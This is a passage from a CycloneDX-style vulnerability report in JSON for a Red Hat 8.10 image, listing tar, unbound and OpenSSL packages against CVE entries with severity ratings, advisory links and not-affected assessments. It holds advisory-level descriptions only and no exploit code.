          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33056",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        61
      ],
      "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33056"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33056"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056"
        },
        {
          "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8138-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8139-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8168-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056"
        }
      ],
      "published": "2026-03-20T08:16:11+00:00",
      "updated": "2026-06-17T10:36:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34180",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive\nelement whose content exceeds 2 gigabytes in length may cause a heap buffer\nover-read on 64-bit Unix and Unix-like platforms.\n\nImpact summary: The heap buffer over-read may crash the application (Denial of\nService) or to load into the decoded ASN.1 object contents of memory beyond the\nend of the input buffer.  More typically such ASN.1 elements would instead be\ntruncated.\n\nAn integer truncation in OpenSSL's ASN.1 decoder causes the content length of\nan ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the\nworst case the truncated length is treated as a request to scan the binary\ncontent for a terminating zero byte, possibly causing OpenSSL to read either\nless than or beyond the end of the allocated buffer.\n\nApplications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or\nany other d2i_* decoding function are affected. OpenSSL's own command-line\ntools are not vulnerable, as data read through the BIO layer is checked before\nit reaches the affected code. The issue only affects 64-bit Unix and Unix-like\nplatforms; 32-bit platforms and 64-bit Windows are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34180"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34180"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-3c8f-qq7h-7qv6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/cbe418ae978539cf14a398a207dba834c0e93e83"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f696c73c3e61b8c502d040af62e690c060908a16"
        },
        {
          "url": "https://github.com/openssl/security/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d"
        },
        {
          "url": "https://github.com/openssl/security/commit/cbe418ae978539cf14a398a207dba834c0e93e83"
        },
        {
          "url": "https://github.com/openssl/security/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff"
        },
        {
          "url": "https://github.com/openssl/security/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43"
        },
        {
          "url": "https://github.com/openssl/security/commit/f696c73c3e61b8c502d040af62e690c060908a16"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-34180.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34180"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34180"
        }
      ],
      "published": "2026-06-09T17:17:04+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
